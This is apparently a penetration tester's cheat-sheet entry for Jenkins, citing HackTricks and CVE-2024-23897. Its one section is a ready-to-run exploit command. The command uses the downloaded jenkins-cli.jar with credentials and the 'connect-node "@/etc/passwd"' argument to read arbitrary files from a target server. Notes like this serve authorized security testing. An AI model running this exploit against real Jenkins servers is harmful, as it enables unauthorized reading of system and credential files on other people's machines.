#######
Jenkins
#######

| https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security

**************
CVE-2024-23897
**************

| File read
| Retrieve the jenkins client jar from target
| When authenticated you can retrieve a full file content

.. code-block:: bash

    # http://target:8080/jnlpJars/jenkins-cli.jar
    java -jar ~/jenkins-cli.jar -noCertificateCheck -s http://target:8080/ -auth testtest:testtest connect-node "@/etc/passwd"

|